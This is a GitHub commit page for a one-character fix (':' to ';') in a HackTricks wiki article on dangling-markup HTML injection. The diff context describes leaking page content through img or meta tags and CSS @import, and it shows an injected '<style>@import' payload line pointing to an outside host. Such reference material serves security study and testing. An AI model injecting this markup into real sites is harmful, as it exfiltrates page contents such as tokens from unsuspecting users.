Skip to content

Commit

Permalink
Merge pull request HackTricks-wiki#243 from rishuranjanofficial/patch-1
Browse files Browse the repository at this point in the history
Update in content
  • Loading branch information
carlospolop authored Sep 25, 2021
2 parents 8159afd + 84f5673 commit e83ff80
Showing 1 changed file with 1 addition and 1 deletion.
Original file line number Diff line number Diff line change
Expand Up @@ -23,7 +23,7 @@ If the `img` tag is forbidden \(due to CSP for example\) you can also use `<meta

Note that **Chrome blocks HTTP URLs** with "&lt;" or "\n" in it, so you could try other protocol schemes like "ftp".

You can also abuse CSS `@import` \(will send all the code until it find a ":"\)
You can also abuse CSS `@import` \(will send all the code until it find a ";"\)

```markup
<style>@import//hackvertor.co.uk? <--- Injected
Expand Down

0 comments on commit e83ff80

Please sign in to comment.